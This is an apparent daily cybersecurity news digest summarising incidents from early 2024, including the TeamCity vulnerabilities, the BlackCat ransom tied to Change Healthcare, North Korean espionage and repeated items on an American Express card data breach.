Daily Brief

Cloudflare has enhanced its web application firewall (WAF) to include protections specifically designed for applications utilizing large language models (LLMs). The service, known as "Firewall for AI," aims to prevent DDoS attacks and the leakage of sensitive data from LLM applications. Features include Advanced Rate Limiting, which caps the number of requests from a single IP or API key, and Sensitive Data Detection, geared towards identifying and preventing private information from being exposed. Clients will be able to create tailored fingerprints to control what their models reveal, with plans to introduce a beta version of prompt validation to defend against prompt injection attacks. This new firewall offering can be applied to any LLM, regardless of whether it's hosted on Cloudflare Workers AI or other platforms, as long as the traffic is proxied through Cloudflare. Cloudflare's move is a response to security concerns in AI as more companies integrate LLMs into their products, highlighting the need for specialized AI security measures.

A security lapse at a third-party service provider resulted in the exposure of American Express cardholder information, including card numbers and expiry dates. The breach involved personal data of an undisclosed number of American Express customers but did not compromise American Express's own systems. American Express's chief privacy officer, Anneke Covell, alerted affected customers through a letter advising of the potential compromise of their card account information. The state of Massachusetts publicized the incident, noting that American Express has been reported for data leaks 16 times this year in the state. Past data breaches reported involved single-digit numbers of Massachusetts residents and were often due to compromised individual merchants or data found online by law enforcement. American Express assures customers that they will not be held liable for fraudulent charges and advises customers to monitor their accounts and enable alerts for suspicious activities.

A severe security vulnerability (CVE-2024-27198) has been identified in JetBrains’ TeamCity On-Premises software, enabling attackers to gain administrative control of the server without authentication. Administrators are urged to promptly upgrade to TeamCity version 2023.11.4 or apply a security patch plugin, as full exploit details are public. The JetBrain's update also resolves a secondary vulnerability (CVE-2024-27199), which permitted alteration of certain system settings by unauthenticated users. Both vulnerabilities affect the web component of all on-premise TeamCity versions, posing potential risks for supply chain attacks. Cybersecurity firm Rapid7 demonstrated exploitability by creating an exploit for a shell access session on a TeamCity server. The less severe vulnerability could potentially be exploited to execute DoS attacks or intercept client connections if the attacker is already on the network. While the TeamCity cloud service has been patched, all unpatched on-premises installations remain vulnerable, and threat actors are anticipated to exploit these weaknesses imminently.

North Korean state-sponsored hacking group Kimsuky is utilizing flaws in ScreenConnect to deploy ToddleShark malware for espionage. ConnectWise earlier urged ScreenConnect users to update servers to patch vulnerabilities CVE-2024-1708 and CVE-2024-1709. ToddleShark uses polymorphism and legitimate Microsoft binaries to evade detection and achieve persistence for continuous data theft. The malware modifies registry settings, schedules tasks, and gathers system information to be sent to the hackers' C2 infrastructure. Kroll's cybersecurity intelligence report indicates ToddleShark's evasion techniques and ties it to previously known Kimsuky backdoors BabyShark and ReconShark. Kroll is set to release specific details and indicators of compromise related to ToddleShark in an upcoming blog post.

Hackers from TA577 are using phishing emails to steal Windows NTLM authentication hashes, enabling account hijacking. Two recent waves of attacks on February 26 and 27, 2024, specifically targeted employees' hashes at hundreds of organizations worldwide. Captured NTLM hashes can facilitate unauthorized access to accounts, sensitive data, and lateral movement within networks. The phishing emails contained ZIP archives with HTML files designed to silently connect to an attacker-controlled SMB server to capture NTLM hashes. Proofpoint's report indicates that despite the lack of malware payloads, the primary objective of these phishing efforts is to gather NTLM hashes. Experts suggest disabling multi-factor authentication increases vulnerability to such attacks and that the stolen hashes may be used for reconnaissance to identify high-value targets. Recommended defensive measures include blocking outbound SMB connections, filtering emails with zipped HTML files, and configuring Windows group policy to restrict outgoing NTLM traffic.

ALPHV/BlackCat, a ransomware gang, is linked to receiving a $22 million ransom payment in Bitcoin possibly connected to the Change Healthcare cyberattack. The payment was detected by Recorded Future analyst Dmitry Smilyanets, observing a 350 Bitcoin transaction to a wallet tied to ALPHV. Change Healthcare, an IT provider for over 70,000 US pharmacies and hospitals, suffered a major BlackCat ransomware attack impacting prescription processing. Questions to Change’s parent company, UnitedHealth Group, about the ransom payment remained unanswered, with a focus on ongoing investigation cited. The ransomware attack disrupted services across multiple pharmacies, including CVS and Walgreens, with systems needing to go offline due to the incident. ALPHV reportedly stole the ransom money from its affiliate who initially executed the cyberattack, raising concerns about trust within ransomware rings. The affiliate claims to retain 4TB of sensitive data from Change Healthcare and its partners, threatening potential leaks if payments are not secured. The situation illustrates the lack of "honor among thieves" and serves as a warning about the risks and reliability within cybercrime affiliate networks.

North Korean operatives allegedly infiltrated servers of South Korean chipmakers to steal product designs, aiding their home semiconductor industry development. Seoul's National Intelligence Service reported ongoing cyber-espionage activities aimed at semiconductor equipment makers since last year. Attackers utilized "living off the land" tactics by employing legitimate administrative tools to evade detection while conducting cyber operations. The intrusions resulted in the theft of product design drawings and facility photos, with at least two known companies affected in December and February. The South Korean spy agency is working closely with victimized firms to strengthen defenses and has informed all national semiconductor entities of potential threats. The announcement aligns with recent warnings about North Korean cybercriminals targeting global defense technologies and conducting elaborate social engineering operations. South Korea links these espionage efforts to the North's struggle to acquire technology due to international sanctions and the increased demand for semiconductors in their weapons programs.

A recording of a sensitive German defense call discussing Ukraine was intercepted and leaked by Russian media. The leak was confirmed by the German Ministry of Defense and involved conversations on the Cisco WebEx platform. High-level officials speculate the leak could have resulted from a Russian agent in the call or a flaw in the implementation of WebEx. The audio disclosure has led to allegations by Russia of Germany's intent to secretly aid Ukraine with Taurus missile deliveries. German officials fear Russia may have more intercepted recordings and that this leak is a strategic effort to influence Germany's military aid to Ukraine. Russian officials have made provocative statements, accusing Germany of becoming an enemy and preparing for war, escalating tensions further. The German government is treating the incident as a serious security breach and as an act of "information war" aimed at disinformation and division. The Bundeswehr is investigating the incident, while the defense minister has publicly denounced the leak as a hybrid disinformation attack.

BlackCat ransomware group has abruptly shut down its servers, stirring speculation about its motives. Allegations have been made that BlackCat scammed its own affiliate out of a $22 million ransom received from Optum after an attack on Change Healthcare. Despite the shutdown of their leak blog and negotiation sites, the group's final message remains cryptic, merely stating "Everything is off, we decide." The aggrieved affiliate claims to still possess 4TB of sensitive Optum data, threatening broader impacts on healthcare and insurance companies. Optum's parent company, UnitedHealth Group, has chosen not to comment on the ransom payment allegations, focusing instead on ongoing investigations. BlackCat, which has rebranded multiple times from DarkSide to BlackMatter, had previously been hit by law enforcement, and now there are hints that either an exit scam or another rebranding could be underway.

American Express has issued warnings to customers about a data breach involving one of their merchant processors, leading to the exposure of card information. The breach resulted in the unauthorized access of American Express Card members' data, including account numbers, names, and expiration dates, but not through a compromise of American Express' systems. The specifics regarding the number of affected customers, the identity of the compromised merchant processor, and the timing of the breach remain undisclosed. American Express has commenced an investigation, alerted regulatory authorities, and is in the process of notifying impacted customers in compliance with legal requirements. Customers are advised to monitor their statements for the next 12 to 24 months and report any suspicious transactions, enabling instant notifications through the American Express app for enhanced security. American Express reassures clients that they will not be held liable for any fraudulent charges made with their cards and suggests requesting a new card if their information was compromised.

The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense has announced a breach of the Russian Ministry of Defense (Minoborony) servers. Classified documents purportedly obtained in the cyber operation include sensitive national security details. The "special operation" is said to have been significantly aided by a key minister, Vadimovich, though little context is provided regarding the role or identity. Ukrainian officials released screenshots allegedly from the hacked databases as proof of the successful attack. The legitimacy of the screenshots has not been independently verified by third parties, and the Russian Ministry of Defense has not yet released a statement. The GUR has previously claimed responsibility for cyberattacks on other Russian entities but did not indicate any destructive actions, such as data deletion, in this particular incident with Minoborony.

North Korea reportedly targeted South Korean semiconductor firms to steal sensitive engineering data. South Korea's National Intelligence Service (NIS) identified increased cyber espionage activities against chipmakers in the latter half of 2023. Attackers exploited known vulnerabilities in internet-facing servers to gain initial access and used "living off the land" tactics to steal data and remain undetected. Incidents in December 2023 and February 2024 led to the theft of product designs and facility information. While the companies targeted have not been named, Samsung Electronics and SK Hynix are major players in the sector, with substantial contributions to the global semiconductor market. These cyberattacks are believed to be part of North Korea's efforts to enhance its military and technological capabilities. South Korea's NIS has alerted the affected firms and provided recommendations for detecting and mitigating these threats, emphasizing the importance of security updates and strict access controls.

Ransomware continues to be a significant threat to businesses, with a recent push for a ban on ransomware payments by global law enforcement and cyber security experts. The LockBit ransomware crew has shown resilience, recovering online presence shortly after government-led take-down attempts. Former UK National Cyber Security Center CEO Ciaran Martin advocates for a ban on ransom payments to disrupt cybercrime long-term, acknowledging the associated challenges. Critics of the ban suggest that prohibition could leave businesses with no other option for recovery, potentially leading to severe consequences, including company closures. Proponents of the ban argue that similar measures in the past, like those against kidnapping in Italy, had significant positive impacts. Financial support packages for victims may be necessary, akin to government intervention during the Northern Ireland Troubles. A ban on ransom payments is not currently planned by the governments of the Five Eyes nations, but nearly 50 members of the Counter Ransomware Initiative pledged not to pay ransoms. The debate continues as the average extortion payment reached $1.5 million last year, indicating a rising trend in cyber extortion.

Cybercriminals exploited India's Unified Payments Interface (UPI) for money laundering, recruiting "money mules" through Telegram. The scam utilized an Android application named XHelper to manage mules and facilitate transactions, bypassing India's PMLA. Funds obtained from illegal activities were transferred to accounts in China, using mules to move the money under false pretenses. XHelper enabled mules to track earnings, complete transactions, and provided an incentive system through financial rewards. The application featured a referral system with a pyramid-like structure to expand the network of agents and mules. Mules received training on evading bank security measures and making large transactions through fake corporate accounts. The overarching issue highlights a growing ecosystem of mobile apps designed to streamline money laundering operations. Global efforts by law enforcement, including Europol, resulted in the arrest of over a thousand individuals connected to money mule operations.

American Express has issued a warning to customers regarding the exposure of credit card details through a third-party service provider hack. This data breach affected American Express Travel Related Services Company, a division dealing with travel services. Personal customer information such as card account numbers, names, and expiration dates were accessed by unauthorized parties. Specific details about the service provider compromised, the extent of the data breach, and the timing of the incident remain undisclosed. American Express has notified regulatory authorities, is investigating the breach, and is reaching out to impacted customers to inform them of the situation and the necessary precautions. Customers are advised to review their account statements for the next one to two years, report any suspicious activities, and consider changing their card numbers. The company assures customers that they will not be held liable for any fraudulent charges and recommends setting up instant notifications for transaction alerts.